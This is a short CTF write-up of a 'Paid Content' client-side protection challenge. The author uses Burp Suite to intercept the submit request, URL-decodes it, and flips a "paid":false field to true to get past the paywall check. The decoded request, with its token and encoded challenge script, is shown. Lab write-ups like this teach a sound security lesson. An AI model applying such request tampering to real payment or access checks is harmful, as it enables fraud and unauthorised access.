This is the third challenge in the client-side protection section of the AIS CTF Challenge Series.
Paid Content
This challenge requires me to be a paid user, it says so itself:
I’d rather not pay if I can help it! Now, I’m sure this is backed by Javascript, but I couldn’t see anything obvious when exploring with the Firefox dev tools, so I decided to whip out Burp Suite Community and intercept the traffic.
Switching to the Proxy Tab of Burp then navigating to the AIS CTF Challenge via the Burp embedded browser allows me to intercept requests/responses before they hit the server/client.
Once I’ve navigated to the site and have the challenge modal open, I can enable the intercept mode (shown above, not highlighted) and click submit within the webpage.
This allows us to look at and modify the request (above) before it is sent to the server. At first glance, this seems like a jumble of unreadable text, however, it’s simply URL encoded – if we shove everything from Line 20 into CyberChef with the URL decode module added we get the following:
csrfmiddlewaretoken=Tmfh0ppXwSUzsppW5pMHnDgxWHLsQteOgLmKazHhYBKJF6KjUpQkxaNXcdwkNLKl&challenge_id=paid_content&answer={"oid":"240fceddfaf241edb7bd4ad544b269c1","meta":{"points":100,"challenge_id":"paid_content","name":"Paid Content","description":"Pay for things you want!","prompt":"You must be a paid user to proceed.","category":{"value":"client_side_protections","name":"Client-side Protections"},"console_message":null,"mobile_friendly":false,"encoded":true,"error_msg":"You're not a paid user.","version":"1.0","inputs":[],"retired":false,"bin_hashes":null},"solved":false,"js_file":"CnZhciBfMHhhMDczPVsiUGFpZENvbnRlbnQiLCJ0YWcuY2hhbGxlbmdlLm9wZW4iLCJyZXNvbHZlIiwidGFnLmNoYWxsZW5nZS5zdWJtaXQiLCJzZWNfZnVuY19uYW1lX3BhaWRfY29udGVudCIsImNoYWxsZW5nZSIsInN0cmluZ2lmeSJdOyhmdW5jdGlvbigpe3dpbmRvd1tfMHhhMDczWzBdXT0gZnVuY3Rpb24oXzB4NGM5M3gxLF8weDRjOTN4Mil7aWYoXzB4NGM5M3gyPT09IF8weGEwNzNbMV0pe2xldCBfMHg0YzkzeDM9JC5EZWZlcnJlZCgpO3JldHVybiBfMHg0YzkzeDNbXzB4YTA3M1syXV0oKX1lbHNlIHtpZihfMHg0YzkzeDI9PT0gXzB4YTA3M1szXSl7cmV0dXJuIHNlY19mdW5jX25hbWVfcGFpZF9jb250ZW50KF8weDRjOTN4MSl9fTtsZXQgXzB4NGM5M3gzPSQuRGVmZXJyZWQoKTtyZXR1cm4gXzB4NGM5M3gzW18weGEwNzNbMl1dKCl9O3dpbmRvd1tfMHhhMDczWzRdXT0gZnVuY3Rpb24oXzB4NGM5M3gxKXtsZXQgXzB4NGM5M3gzPSQuRGVmZXJyZWQoKTtyZXR1cm4gXzB4NGM5M3gzW18weGEwNzNbMl1dKEpTT05bXzB4YTA3M1s2XV0oXzB4NGM5M3gxW18weGEwNzNbNV1dKSl9fSkoKQo=","js_function":"PaidContent","paid":false}
That’s a very interesting field at the end of the JSON string… "paid":false I wonder what happens if we change that to true and then forward the request….
Turns out it’s as easy as that! A delicious 100 points and the Client-side Protections section complete.
I hope this post was somewhat informative, do feel free to let us know if there was any shortcuts you would have used or if you found a more elegant solution!